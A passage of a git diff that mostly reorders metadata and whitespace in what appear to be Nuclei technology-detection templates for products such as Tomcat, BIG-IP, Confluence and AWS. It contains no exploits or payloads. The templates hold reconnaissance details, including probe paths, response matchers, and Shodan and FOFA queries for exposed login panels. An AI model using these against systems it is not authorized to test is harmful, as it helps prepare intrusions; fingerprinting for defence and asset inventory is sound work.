a/http/technologies/activecollab-detect.yaml +++ b/http/technologies/activecollab-detect.yaml @@ -16,6 +16,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/technologies/adfs-detect.yaml b/http/technologies/adfs-detect.yaml index ac3209144f..e2106eb3b4 100644 --- a/http/technologies/adfs-detect.yaml +++ b/http/technologies/adfs-detect.yaml @@ -5,9 +5,9 @@ info: author: Adam Crosser severity: info description: Detects ADFS with forms-based authentication enabled. - tags: tech,adfs metadata: max-request: 1 + tags: tech,adfs http: - method: GET diff --git a/http/technologies/adobe/adobe-coldfusion-detect.yaml b/http/technologies/adobe/adobe-coldfusion-detect.yaml index ff7d0f3683..2124c284d0 100644 --- a/http/technologies/adobe/adobe-coldfusion-detect.yaml +++ b/http/technologies/adobe/adobe-coldfusion-detect.yaml @@ -6,8 +6,8 @@ info: severity: info description: With this template we can detect the version number of Coldfusion instances based on their logos. metadata: - max-request: 6 verified: true + max-request: 6 shodan-query: http.component:"Adobe ColdFusion" tags: adobe,coldfusion,tech diff --git a/http/technologies/adobe/adobe-coldfusion-error-detect.yaml b/http/technologies/adobe/adobe-coldfusion-error-detect.yaml index f670b8cbd0..50117d8ae2 100644 --- a/http/technologies/adobe/adobe-coldfusion-error-detect.yaml +++ b/http/technologies/adobe/adobe-coldfusion-error-detect.yaml @@ -8,8 +8,8 @@ info: reference: - https://twitter.com/PhilippeDelteil/status/1418622775829348358 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.component:"Adobe ColdFusion" tags: adobe,coldfusion,tech diff --git a/http/technologies/aem-cms.yaml b/http/technologies/aem-cms.yaml index b4a9dac3ad..f43f6007d9 100644 --- a/http/technologies/aem-cms.yaml +++ b/http/technologies/aem-cms.yaml @@ -4,9 +4,9 @@ info: name: AEM Finder author: Swissky severity: info - tags: aem,tech metadata: max-request: 1 + tags: aem,tech http: - method: GET diff --git a/http/technologies/aem-detect.yaml b/http/technologies/aem-detect.yaml index c5b4ea6c45..79763c6569 100644 --- a/http/technologies/aem-detect.yaml +++ b/http/technologies/aem-detect.yaml @@ -22,7 +22,6 @@ http: host-redirects: true max-redirects: 2 - matchers: - type: dsl dsl: diff --git a/http/technologies/aerocms-detect.yaml b/http/technologies/aerocms-detect.yaml index 2f91dc6733..621c83c381 100644 --- a/http/technologies/aerocms-detect.yaml +++ b/http/technologies/aerocms-detect.yaml @@ -5,10 +5,10 @@ info: author: pikpikcu severity: info metadata: - max-request: 1 verified: true - fofa-query: "AeroCMS" + max-request: 1 shodan-query: title:"AeroCMS" + fofa-query: "AeroCMS" tags: tech,aerocms http: diff --git a/http/technologies/airtame-device-detect.yaml b/http/technologies/airtame-device-detect.yaml index 8691731db9..2491bd71ce 100644 --- a/http/technologies/airtame-device-detect.yaml +++ b/http/technologies/airtame-device-detect.yaml @@ -4,9 +4,9 @@ info: name: Airtame Device Detect author: princechaddha severity: info - tags: tech,airtame,iot metadata: max-request: 1 + tags: tech,airtame,iot http: - method: GET diff --git a/http/technologies/akamai-cache-detect.yaml b/http/technologies/akamai-cache-detect.yaml index a54ae1bde3..dec1c7aacf 100644 --- a/http/technologies/akamai-cache-detect.yaml +++ b/http/technologies/akamai-cache-detect.yaml @@ -5,22 +5,22 @@ info: author: nybble04 severity: info description: | - Sends a HEAD request with a Pragma header value of "akamai-x-cache-on" and looks for an akamai-specific response header value. + Sends a HEAD request with a Pragma header value of "akamai-x-cache-on" and looks for an akamai-specific response header value. reference: - https://community.akamai.com/customers/s/article/Using-Akamai-Pragma-headers-to-investigate-or-troubleshoot-Akamai-content-delivery?language=en_US - https://spyclub.tech/2022/12/14/unusual-cache-poisoning-akamai-s3/ metadata: - max-request: 1 verified: true + max-request: 1 tags: cache,akamai,tech http: - method: HEAD path: - "{{BaseURL}}" + headers: Pragma: akamai-x-cache-on - matchers: - type: regex part: header diff --git a/http/technologies/akamai-detect.yaml b/http/technologies/akamai-detect.yaml index a0ab2830ad..9fd22dd990 100644 --- a/http/technologies/akamai-detect.yaml +++ b/http/technologies/akamai-detect.yaml @@ -8,18 +8,17 @@ info: - https://support.globaldots.com/hc/en-us/articles/115003996705-Akamai-Pragma-Headers-overview - https://community.akamai.com/customers/s/article/Using-Akamai-Pragma-headers-to-investigate-or-troubleshoot-Akamai-content-delivery?language=en_US - https://spyclub.tech/2022/12/14/unusual-cache-poisoning-akamai-s3/ - tags: akamai,cdn,tech metadata: max-request: 1 - + tags: akamai,cdn,tech http: - method: GET path: - "{{BaseURL}}" + headers: Pragma: akamai-x-cache-on - matchers: - type: word part: x_cache diff --git a/http/technologies/ambassador-edge-stack-detect.yaml b/http/technologies/ambassador-edge-stack-detect.yaml index d338265a03..8d2defd7a2 100644 --- a/http/technologies/ambassador-edge-stack-detect.yaml +++ b/http/technologies/ambassador-edge-stack-detect.yaml @@ -7,8 +7,8 @@ info: description: | Ambassador Edge Stack is a Kubernetes-native API Gateway that delivers the scalability, security, and simplicity for some of the world's largest Kubernetes installations. metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Ambassador Edge Stack" tags: tech,ambassador,gateway diff --git a/http/technologies/angular-detect.yaml b/http/technologies/angular-detect.yaml index f1fb21acae..53c54015fc 100644 --- a/http/technologies/angular-detect.yaml +++ b/http/technologies/angular-detect.yaml @@ -8,8 +8,8 @@ info: reference: - https://github.com/angular/angular metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: html:"ng-version=" tags: tech,angular @@ -19,7 +19,6 @@ http: - "{{BaseURL}}" matchers-condition: and - matchers: - part: body type: word diff --git a/http/technologies/ansible-awx-detect.yaml b/http/technologies/ansible-awx-detect.yaml index 3ae4b0abbe..e22ed04acb 100644 --- a/http/technologies/ansible-awx-detect.yaml +++ b/http/technologies/ansible-awx-detect.yaml @@ -8,8 +8,8 @@ info: reference: - https://github.com/ansible/awx metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: html:'Select a frequency for snapshot retention' tags: tech,ansible,awx diff --git a/http/technologies/apache/airflow-detect.yaml b/http/technologies/apache/airflow-detect.yaml index 79ac38763c..726544ed59 100644 --- a/http/technologies/apache/airflow-detect.yaml +++ b/http/technologies/apache/airflow-detect.yaml @@ -5,10 +5,10 @@ info: author: pdteam severity: info metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.html:"Apache Airflow" - tags: tech,apache,airflow + tags: tech,apache,airflow,intrusive http: - method: GET @@ -17,7 +17,6 @@ http: matchers-condition: and matchers: - - type: word part: body words: diff --git a/http/technologies/apache/apache-axis-detect.yaml b/http/technologies/apache/apache-axis-detect.yaml index c4c26e1ddd..2b7732f3dd 100644 --- a/http/technologies/apache/apache-axis-detect.yaml +++ b/http/technologies/apache/apache-axis-detect.yaml @@ -6,8 +6,8 @@ info: severity: info description: Axis and Axis2 detection metadata: - max-request: 3 verified: true + max-request: 3 shodan-query: http.html:"Apache Axis" tags: tech,axis2,middleware,apache @@ -19,6 +19,7 @@ http: - "{{BaseURL}}/axis/" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/technologies/apache/apache-cocoon-detect.yaml b/http/technologies/apache/apache-cocoon-detect.yaml index ac0b5d88ef..8c1fab592c 100644 --- a/http/technologies/apache/apache-cocoon-detect.yaml +++ b/http/technologies/apache/apache-cocoon-detect.yaml @@ -5,8 +5,8 @@ info: author: ffffffff0x severity: info metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.html:"Apache Cocoon" fofa-query: app="APACHE-Cocoon" tags: apache,cocoon,tech diff --git a/http/technologies/apache/apache-detect.yaml b/http/technologies/apache/apache-detect.yaml index 4f5c7e5c55..dc4c68a266 100644 --- a/http/technologies/apache/apache-detect.yaml +++ b/http/technologies/apache/apache-detect.yaml @@ -5,9 +5,9 @@ info: author: philippedelteil severity: info description: Some Apache servers have the version on the response header. The OpenSSL version can be also obtained - tags: tech,apache metadata: max-request: 1 + tags: tech,apache http: - method: GET @@ -16,7 +16,6 @@ http: matchers-condition: and matchers: - - type: regex part: header regex: diff --git a/http/technologies/apache/apache-guacamole.yaml b/http/technologies/apache/apache-guacamole.yaml index ffec8fe644..c0efec2efa 100644 --- a/http/technologies/apache/apache-guacamole.yaml +++ b/http/technologies/apache/apache-guacamole.yaml @@ -4,9 +4,9 @@ info: name: Apache Guacamole Login Page and version detection author: r3dg33k severity: info - tags: apache,guacamole,tech,login metadata: max-request: 1 + tags: apache,guacamole,tech,login http: - method: GET diff --git a/http/technologies/apache/apache-karaf-panel.yaml b/http/technologies/apache/apache-karaf-panel.yaml index 723f1344a2..bba3b79190 100644 --- a/http/technologies/apache/apache-karaf-panel.yaml +++ b/http/technologies/apache/apache-karaf-panel.yaml @@ -5,8 +5,8 @@ info: author: s0obi severity: info metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: realm="karaf" tags: tech,apache,karaf diff --git a/http/technologies/apache/default-apache-test-all.yaml b/http/technologies/apache/default-apache-test-all.yaml index 160ec8bc2a..7ef1ced0a1 100644 --- a/http/technologies/apache/default-apache-test-all.yaml +++ b/http/technologies/apache/default-apache-test-all.yaml @@ -16,8 +16,8 @@ http: - '{{BaseURL}}' matchers: - - type: regex # type of the extractor - part: body # part of the response (header,body,all) + - type: regex # type of the extractor + part: body # part of the response (header,body,all) condition: or regex: - ".*?Apache(|\\d+) .*?(Default|Test).*?" diff --git a/http/technologies/apache/default-apache2-ubuntu-page.yaml b/http/technologies/apache/default-apache2-ubuntu-page.yaml index 8676403b20..13de7bf85f 100644 --- a/http/technologies/apache/default-apache2-ubuntu-page.yaml +++ b/http/technologies/apache/default-apache2-ubuntu-page.yaml @@ -13,6 +13,7 @@ http: - method: GET path: - '{{BaseURL}}' + matchers: - type: word words: diff --git a/http/technologies/apache/kafka-manager-panel.yaml b/http/technologies/apache/kafka-manager-panel.yaml index 7f04a36522..3bcee5976a 100644 --- a/http/technologies/apache/kafka-manager-panel.yaml +++ b/http/technologies/apache/kafka-manager-panel.yaml @@ -7,10 +7,10 @@ info: reference: - https://github.com/yahoo/CMAK metadata: - max-request: 1 verified: true - fofa-query: app="Kafka-Manager" + max-request: 1 shodan-query: title:"Kafka-Manager" + fofa-query: app="Kafka-Manager" tags: tech,kafka,apache http: diff --git a/http/technologies/apache/ranger-detection.yaml b/http/technologies/apache/ranger-detection.yaml index de6226cb64..66a45055cb 100644 --- a/http/technologies/apache/ranger-detection.yaml +++ b/http/technologies/apache/ranger-detection.yaml @@ -4,11 +4,11 @@ info: name: Apache Ranger Detection author: For3stCo1d severity: info - tags: tech,apache,ranger + reference: https://github.com/apache/ranger metadata: max-request: 2 shodan-query: http.title:"Ranger - Sign In" - reference: https://github.com/apache/ranger + tags: tech,apache,ranger http: - method: GET @@ -17,6 +17,7 @@ http: - "{{BaseURL}}/images/favicon.ico" stop-at-first-match: true + matchers-condition: or matchers: - type: word diff --git a/http/technologies/apache/tomcat-detect.yaml b/http/technologies/apache/tomcat-detect.yaml index 8ba2822eb9..f008681644 100644 --- a/http/technologies/apache/tomcat-detect.yaml +++ b/http/technologies/apache/tomcat-detect.yaml @@ -7,10 +7,10 @@ info: description: If an Tomcat instance is deployed on the target URL, when we send a request for a non existent resource we receive a Tomcat error page with version. metadata: max-request: 3 - shodan-query: title:"Apache Tomcat" vendor: apache product: tomcat - tags: tech,tomcat,apache + shodan-query: title:"Apache Tomcat" + tags: tech,tomcat,apache,intrusive http: - method: GET @@ -20,6 +20,7 @@ http: - "{{BaseURL}}/docs/introduction.html" stop-at-first-match: true + matchers-condition: or matchers: - type: dsl diff --git a/http/technologies/apollo-server-detect.yaml b/http/technologies/apollo-server-detect.yaml index 680d0f54c5..24618860e2 100644 --- a/http/technologies/apollo-server-detect.yaml +++ b/http/technologies/apollo-server-detect.yaml @@ -9,11 +9,11 @@ info: - https://github.com/apollographql/apollo-server classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: apollo,detect,graphql,tech metadata: max-request: 1 + tags: apollo,detect,graphql,tech http: - method: POST diff --git a/http/technologies/apple-httpserver.yaml b/http/technologies/apple-httpserver.yaml index faaeb8fe96..7bfe02863b 100644 --- a/http/technologies/apple-httpserver.yaml +++ b/http/technologies/apple-httpserver.yaml @@ -5,10 +5,10 @@ info: author: pikpikcu severity: info metadata: - max-request: 1 verified: true - fofa-query: app="Apple-HttpServer" + max-request: 1 shodan-query: "AppleHttpServer" + fofa-query: app="Apple-HttpServer" tags: tech,apple,httpserver http: diff --git a/http/technologies/aqua-enterprise-detect.yaml b/http/technologies/aqua-enterprise-detect.yaml index ca0d669d1b..5e1879b0b3 100644 --- a/http/technologies/aqua-enterprise-detect.yaml +++ b/http/technologies/aqua-enterprise-detect.yaml @@ -6,8 +6,8 @@ info: severity: info reference: https://www.aquasec.com/ metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.favicon.hash:-1261322577 tags: tech,aqua diff --git a/http/technologies/artica-web-proxy-detect.yaml b/http/technologies/artica-web-proxy-detect.yaml index 21324af728..e0a1931852 100644 --- a/http/technologies/artica-web-proxy-detect.yaml +++ b/http/technologies/artica-web-proxy-detect.yaml @@ -4,9 +4,9 @@ info: name: Artica Web Proxy Detect author: dwisiswant0 severity: info - tags: tech,artica,proxy metadata: max-request: 1 + tags: tech,artica,proxy http: - method: GET @@ -21,4 +21,4 @@ http: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/http/technologies/avideo-detect.yaml b/http/technologies/avideo-detect.yaml index 26e6a86bed..7138cdeb6b 100644 --- a/http/technologies/avideo-detect.yaml +++ b/http/technologies/avideo-detect.yaml @@ -5,8 +5,8 @@ info: author: pikpikcu severity: info metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.title:"AVideo" fofa-query: "AVideo" tags: tech,avideo @@ -18,6 +18,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: regex diff --git a/http/technologies/aws-elastic-beanstalk-detect.yaml b/http/technologies/aws-elastic-beanstalk-detect.yaml index e6849e6fd7..b9ade9f09d 100644 --- a/http/technologies/aws-elastic-beanstalk-detect.yaml +++ b/http/technologies/aws-elastic-beanstalk-detect.yaml @@ -4,9 +4,9 @@ info: name: AWS Elastic Beanstalk Detect author: pussycat0x severity: info - tags: aws,tech,beanstalk metadata: max-request: 1 + tags: aws,tech,beanstalk http: - method: GET diff --git a/http/technologies/aws/amazon-ec2-detect.yaml b/http/technologies/aws/amazon-ec2-detect.yaml index 86bd197bc9..e5f1b11afd 100644 --- a/http/technologies/aws/amazon-ec2-detect.yaml +++ b/http/technologies/aws/amazon-ec2-detect.yaml @@ -5,8 +5,8 @@ info: author: ritikchaddha severity: info metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: "Server: EC2ws" tags: tech,aws,ec2,amazon diff --git a/http/technologies/aws/aws-bucket-service.yaml b/http/technologies/aws/aws-bucket-service.yaml index a077366d27..a69153cd84 100644 --- a/http/technologies/aws/aws-bucket-service.yaml +++ b/http/technologies/aws/aws-bucket-service.yaml @@ -4,9 +4,9 @@ info: name: Detect websites using AWS bucket storage author: pdteam severity: info - tags: aws,tech,bucket metadata: max-request: 1 + tags: aws,tech,bucket http: - method: GET diff --git a/http/technologies/aws/aws-cloudfront-service.yaml b/http/technologies/aws/aws-cloudfront-service.yaml index 708f5c9b19..d61ed669f8 100644 --- a/http/technologies/aws/aws-cloudfront-service.yaml +++ b/http/technologies/aws/aws-cloudfront-service.yaml @@ -5,9 +5,9 @@ info: author: jiheon-dev severity: info description: Detect websites using AWS cloudfront service - tags: aws,tech,service metadata: max-request: 1 + tags: aws,tech,service http: - method: GET diff --git a/http/technologies/azure-kubernetes-service.yaml b/http/technologies/azure-kubernetes-service.yaml index e7a70b5b89..7d70473727 100644 --- a/http/technologies/azure-kubernetes-service.yaml +++ b/http/technologies/azure-kubernetes-service.yaml @@ -4,9 +4,9 @@ info: name: Detect Azure Kubernetes Service author: dhiyaneshDk severity: info - tags: tech,azure,k8s,kubernetes metadata: max-request: 1 + tags: tech,azure,k8s,kubernetes http: - method: GET diff --git a/http/technologies/b2b-builder-detect.yaml b/http/technologies/b2b-builder-detect.yaml index a26ee64afc..c56abc775d 100644 --- a/http/technologies/b2b-builder-detect.yaml +++ b/http/technologies/b2b-builder-detect.yaml @@ -16,6 +16,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/technologies/basic-auth-detect.yaml b/http/technologies/basic-auth-detect.yaml index 434de92838..9510232e7a 100644 --- a/http/technologies/basic-auth-detect.yaml +++ b/http/technologies/basic-auth-detect.yaml @@ -4,9 +4,9 @@ info: name: Basic Auth Detection author: w4cky_ severity: info - tags: tech,basic-auth metadata: max-request: 1 + tags: tech,basic-auth http: - method: GET diff --git a/http/technologies/besu-server-detect.yaml b/http/technologies/besu-server-detect.yaml index e7bdaa7144..eac2eafede 100644 --- a/http/technologies/besu-server-detect.yaml +++ b/http/technologies/besu-server-detect.yaml @@ -5,14 +5,14 @@ info: author: Nullfuzz severity: info description: | - Besu is an open source Ethereum client developed under the Apache 2.0 license and written in Java. By default Besu runs a JSON-RPC HTTP server on port 8545/TCP + Besu is an open source Ethereum client developed under the Apache 2.0 license and written in Java. By default Besu runs a JSON-RPC HTTP server on port 8545/TCP reference: - https://besu.hyperledger.org/ - https://besu.hyperledger.org/public-networks/how-to/use-besu-api#service-ports metadata: + verified: true max-request: 1 shodan-query: product:"besu" - verified: true tags: tech,besu,ethereum,web3,blockchain http: diff --git a/http/technologies/bigip-config-utility-detect.yaml b/http/technologies/bigip-config-utility-detect.yaml index 95989b2bfa..9dfa5c4d28 100644 --- a/http/technologies/bigip-config-utility-detect.yaml +++ b/http/technologies/bigip-config-utility-detect.yaml @@ -4,15 +4,16 @@ info: name: BIG-IP Configuration Utility detected author: dwisiswant0 severity: info - tags: tech,bigip metadata: max-request: 3 + tags: tech,bigip http: - method: GET path: - "{{BaseURL}}/tmui/login.jsp" - "{{BaseURL}}/tmui/tmui/login/welcome.jsp" + matchers: - type: word words: @@ -20,9 +21,11 @@ http: - "Configuration Utility" condition: and part: body + - method: GET path: - "{{BaseURL}}/mgmt/tm/sys/management-ip" + matchers: - type: word words: @@ -30,6 +33,7 @@ http: - "Enterprise Manager" condition: and part: header + - type: word words: - "check your user-id and password and try again" diff --git a/http/technologies/bigip-detect.yaml b/http/technologies/bigip-detect.yaml index aff4c55fc9..2b54359bf9 100644 --- a/http/technologies/bigip-detect.yaml +++ b/http/technologies/bigip-detect.yaml @@ -7,9 +7,9 @@ info: reference: - https://www.intelisecure.com/how-to-decode-big-ip-f5-persistence-cookie-values - https://support.f5.com/csp/article/K23254150 - tags: bigip,tech metadata: max-request: 1 + tags: bigip,tech http: - method: GET diff --git a/http/technologies/blazor-webassembly-detect.yaml b/http/technologies/blazor-webassembly-detect.yaml index 195412e174..75b47cc6f3 100644 --- a/http/technologies/blazor-webassembly-detect.yaml +++ b/http/technologies/blazor-webassembly-detect.yaml @@ -10,8 +10,8 @@ info: - https://dotnet.microsoft.com/en-us/apps/aspnet/web-apps/blazor - https://github.com/righettod/burp-piper-custom-scripts/issues/1 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: html:"blazor.boot.json" tags: blazor,webassembly,detect @@ -21,6 +21,7 @@ http: - '{{BaseURL}}/_framework/blazor.boot.json' stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/technologies/burp-api-detect.yaml b/http/technologies/burp-api-detect.yaml index 6ff32b7ac0..80884393a3 100644 --- a/http/technologies/burp-api-detect.yaml +++ b/http/technologies/burp-api-detect.yaml @@ -6,9 +6,9 @@ info: severity: info reference: - https://portswigger.net/burp/documentation/enterprise/api-reference - tags: burp,tech metadata: max-request: 1 + tags: burp,tech http: - method: GET @@ -21,10 +21,12 @@ http: words: - 'Burp API' part: body + - type: word words: - 'X-Burp-Version' part: header + - type: status status: - 200 diff --git a/http/technologies/burp-collaborator-detect.yaml b/http/technologies/burp-collaborator-detect.yaml index 859d60f7ae..e3270c809a 100644 --- a/http/technologies/burp-collaborator-detect.yaml +++ b/http/technologies/burp-collaborator-detect.yaml @@ -10,11 +10,11 @@ info: - https://portswigger.net/burp/documentation/collaborator classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: "Server: Burp Collaborator" tags: burp,tech,detect diff --git a/http/technologies/carestream-vue-detect.yaml b/http/technologies/carestream-vue-detect.yaml index 0a5de7eebf..58dda397f7 100644 --- a/http/technologies/carestream-vue-detect.yaml +++ b/http/technologies/carestream-vue-detect.yaml @@ -7,9 +7,9 @@ info: description: This template will detect a running CARESTREAM Vue Motion instance reference: - https://www.carestream.com/en/us/-/media/publicsite/resources/radiography-and-health-it/product-brochures/ris-pacs/pdfs/brochure-vue-motion-201601.pdf - tags: tech,myvuehelp metadata: max-request: 2 + tags: tech,myvuehelp http: - method: GET @@ -20,6 +20,7 @@ http: host-redirects: true stop-at-first-match: true max-redirects: 2 + matchers-condition: or matchers: - type: dsl @@ -30,4 +31,4 @@ http: - type: dsl name: "myvuehelp-favicon" dsl: - - "status_code==200 && (\"1c4b2c10acccc48852d12eddadaf7944\" == md5(body))" \ No newline at end of file + - "status_code==200 && (\"1c4b2c10acccc48852d12eddadaf7944\" == md5(body))" diff --git a/http/technologies/casaos-detection.yaml b/http/technologies/casaos-detection.yaml index 368c08bdea..d6e6144309 100644 --- a/http/technologies/casaos-detection.yaml +++ b/http/technologies/casaos-detection.yaml @@ -7,9 +7,9 @@ info: reference: - https://github.com/IceWhaleTech/CasaOS metadata: - fofa-query: body="/CasaOS-UI/public/index.html" max-request: 1 shodan-query: http.html:"/CasaOS-UI/public/index.html" + fofa-query: body="/CasaOS-UI/public/index.html" tags: casaos,tech,oss http: @@ -26,4 +26,4 @@ http: - type: regex group: 1 regex: - - CasaOS Version:\s*([0-9.]+) \ No newline at end of file + - CasaOS Version:\s*([0-9.]+) diff --git a/http/technologies/catalog-creator-detect.yaml b/http/technologies/catalog-creator-detect.yaml index e895dcf653..63f845e709 100644 --- a/http/technologies/catalog-creator-detect.yaml +++ b/http/technologies/catalog-creator-detect.yaml @@ -7,11 +7,11 @@ info: description: CATALOGcreator Page login panel detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: http.html:"powered by CATALOGcreator" tags: tech,catalogcreater,panel @@ -24,6 +24,7 @@ http: stop-at-first-match: true host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/technologies/checkpoint-mobile-detect.yaml b/http/technologies/checkpoint-mobile-detect.yaml index 36ea47dfd3..dfafc2e53f 100644 --- a/http/technologies/checkpoint-mobile-detect.yaml +++ b/http/technologies/checkpoint-mobile-detect.yaml @@ -9,8 +9,8 @@ info: reference: - https://www.checkpoint.com/quantum/remote-access-vpn/ metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.html:"Check Point Mobile" tags: panel,checkpoint,detect diff --git a/http/technologies/citrix-hypervisor-page.yaml b/http/technologies/citrix-hypervisor-page.yaml index b67e760431..d68d4aeb5b 100644 --- a/http/technologies/citrix-hypervisor-page.yaml +++ b/http/technologies/citrix-hypervisor-page.yaml @@ -5,8 +5,8 @@ info: author: pussycat0x severity: info metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.title:"Welcome to Citrix Hypervisor" tags: tech,citrix,default-page @@ -33,4 +33,4 @@ http: part: body group: 1 regex: - - "Welcome to Citrix Hypervisor ([0-9. ]+)" \ No newline at end of file + - "Welcome to Citrix Hypervisor ([0-9. ]+)" diff --git a/http/technologies/cloudflare-nginx-detect.yaml b/http/technologies/cloudflare-nginx-detect.yaml index e874d0a17c..c1d7f85208 100644 --- a/http/technologies/cloudflare-nginx-detect.yaml +++ b/http/technologies/cloudflare-nginx-detect.yaml @@ -7,8 +7,8 @@ info: reference: - https://blog.cloudflare.com/end-of-the-road-for-cloudflare-nginx/ metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: product:"cloudflare-nginx" tags: cloudflare,nginx,tech diff --git a/http/technologies/cloudfoundry-detect.yaml b/http/technologies/cloudfoundry-detect.yaml index 310c8beca4..44e9a2f4a6 100644 --- a/http/technologies/cloudfoundry-detect.yaml +++ b/http/technologies/cloudfoundry-detect.yaml @@ -6,16 +6,15 @@ info: severity: info description: Detects cloudfoundry based on response headers reference: https://docs.cloudfoundry.org/concepts/cf-routing-architecture.html - tags: cloudfoundry,tech metadata: max-request: 2 + tags: cloudfoundry,tech http: - raw: - | GET / HTTP/1.1 Host: {{Hostname}} - # request unknown (random) route - | GET / HTTP/1.1 @@ -24,7 +23,6 @@ http: stop-at-first-match: true req-condition: true matchers: - - type: dsl dsl: - 'contains(header, "X-Vcap-Request-Id:") || contains(header, "X-Cf-Routererror:")' diff --git a/http/technologies/cobbler-version.yaml b/http/technologies/cobbler-version.yaml index e9982adeef..f3fd82fb1e 100644 --- a/http/technologies/cobbler-version.yaml +++ b/http/technologies/cobbler-version.yaml @@ -5,9 +5,9 @@ info: author: c-sh0 severity: info description: Obtain cobbler version information - tags: tech,cobbler,api metadata: max-request: 1 + tags: tech,cobbler,api http: - method: POST @@ -15,11 +15,11 @@ http: - "{{BaseURL}}/cobbler_api" body: | - - - extended_version - - + + + extended_version + + headers: Content-Type: text/xml @@ -40,4 +40,4 @@ http: part: body group: 1 regex: - - "([0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3})" \ No newline at end of file + - "([0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3})" diff --git a/http/technologies/cockpit-detect.yaml b/http/technologies/cockpit-detect.yaml index 6ab6bfe633..2938901e83 100644 --- a/http/technologies/cockpit-detect.yaml +++ b/http/technologies/cockpit-detect.yaml @@ -4,14 +4,15 @@ info: name: Detect Agentejo Cockpit author: dwisiswant0 severity: info - tags: tech,cockpit metadata: max-request: 1 + tags: tech,cockpit http: - method: GET path: - "{{BaseURL}}/auth/login" + matchers: - type: word words: diff --git a/http/technologies/coming-soon-page-detect.yaml b/http/technologies/coming-soon-page-detect.yaml index ab9cb2ca1e..e3e8b27c40 100644 --- a/http/technologies/coming-soon-page-detect.yaml +++ b/http/technologies/coming-soon-page-detect.yaml @@ -5,8 +5,8 @@ info: author: tess severity: info metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Coming Soon" tags: tech,default-page diff --git a/http/technologies/confluence-detect.yaml b/http/technologies/confluence-detect.yaml index abefc2a057..7f866b9cb8 100644 --- a/http/technologies/confluence-detect.yaml +++ b/http/technologies/confluence-detect.yaml @@ -6,11 +6,11 @@ info: severity: info description: Allows you to detect Atlassian Confluence instances metadata: - category: productivity max-request: 5 + vendor: atlassian product: confluence_server shodan-query: http.component:"Atlassian Confluence" - vendor: atlassian + category: productivity tags: tech,confluence,atlassian,detect http: @@ -24,6 +24,7 @@ http: host-redirects: true stop-at-first-match: true + matchers-condition: or matchers: - type: word @@ -48,4 +49,4 @@ http: - type: kval kval: - - version \ No newline at end of file + - version diff --git a/http/technologies/connectwise-control-detect.yaml b/http/technologies/connectwise-control-detect.yaml index 3c9cadf2cb..da4a7121f3 100644 --- a/http/technologies/connectwise-control-detect.yaml +++ b/http/technologies/connectwise-control-detect.yaml @@ -5,8 +5,8 @@ info: author: pikpikcu severity: info metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title="ConnectWise Control Remote Support Software" tags: tech,connectwise diff --git a/http/technologies/craft-cms-detect.yaml b/http/technologies/craft-cms-detect.yaml index 16cf78b90b..783833b9d4 100644 --- a/http/technologies/craft-cms-detect.yaml +++ b/http/technologies/craft-cms-detect.yaml @@ -7,9 +7,9 @@ info: description: Detects Craft CMS reference: - https://craftcms.com - tags: tech,craftcms metadata: max-request: 1 + tags: tech,craftcms http: - method: GET diff --git a/http/technologies/csrfguard-detect.yaml b/http/technologies/csrfguard-detect.yaml index 64182f0ec9..c760dc038e 100644 --- a/http/technologies/csrfguard-detect.yaml +++ b/http/technologies/csrfguard-detect.yaml @@ -9,23 +9,21 @@ info: - https://github.com/OWASP/www-project-csrfguard classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: tech,csrfguard,owasp metadata: max-request: 3 + tags: tech,csrfguard,owasp http: - raw: - | GET / HTTP/1.1 Host: {{Hostname}} - - | GET /JavaScriptServlet HTTP/1.1 Host: {{Hostname}} Referer: {{BaseURL}} - - | POST /JavaScriptServlet HTTP/1.1 Host: {{Hostname}} @@ -56,8 +54,8 @@ http: dsl: - 'status_code_3==200' - 'contains(body, "{\"pageTokens")' - cookie-reuse: true + extractors: - type: regex name: masterToken diff --git a/http/technologies/cvsweb-detect.yaml b/http/technologies/cvsweb-detect.yaml index fd7b2766e3..802462b93c 100644 --- a/http/technologies/cvsweb-detect.yaml +++ b/http/technologies/cvsweb-detect.yaml @@ -9,8 +9,8 @@ info: reference: - https://cvsweb.openbsd.org/ metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"cvsweb" fofa-query: title="cvsweb" zoomeye-query: title:cvsweb @@ -23,6 +23,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: regex diff --git a/http/technologies/dash-panel-detect.yaml b/http/technologies/dash-panel-detect.yaml index 